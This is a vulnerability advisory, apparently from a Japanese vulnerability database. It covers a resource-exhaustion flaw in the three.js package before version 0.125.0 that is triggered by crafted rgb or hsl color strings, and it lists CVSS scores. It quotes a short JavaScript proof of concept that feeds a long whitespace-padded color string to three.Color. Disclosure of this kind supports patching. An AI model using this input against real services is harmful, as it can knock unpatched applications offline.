| Title | three パッケージにおけるリソースの枯渇に関する脆弱性 |
|---|---|
| Summary | three パッケージには、リソースの枯渇に関する脆弱性が存在します。 |
| Possible impacts | サービス運用妨害 (DoS) 状態にされる可能性があります。 |
| Solution | ベンダより正式な対策が公開されています。ベンダ情報を参照して適切な対策を実施してください。 |
| Publication Date | Nov. 12, 2020, midnight |
| Registration Date | Nov. 11, 2021, 12:18 p.m. |
| Last Update | Nov. 11, 2021, 12:18 p.m. |
| CVSS3.0 : 重要 | |
| Score | 7.5 |
|---|---|
| Vector | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
| CVSS2.0 : 警告 | |
| Score | 5 |
|---|---|
| Vector | AV:N/AC:L/Au:N/C:N/I:N/A:P |
| three |
| three 0.125.0 未満 |
| No | Changed Details | Date of change |
|---|---|---|
| 1 | [2021年11月11日] 掲載 |
Nov. 11, 2021, 12:18 p.m. |
| Summary | This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms") |
|---|---|
| Publication Date | Feb. 19, 2021, 12:15 a.m. |
| Registration Date | Feb. 19, 2021, 10:01 a.m. |
| Last Update | Nov. 21, 2024, 2:22 p.m. |
| Configuration1 | or higher | or less | more than | less than | |
| cpe:2.3:a:three_project:three:*:*:*:*:*:node.js:*:* | 0.125.0 | ||||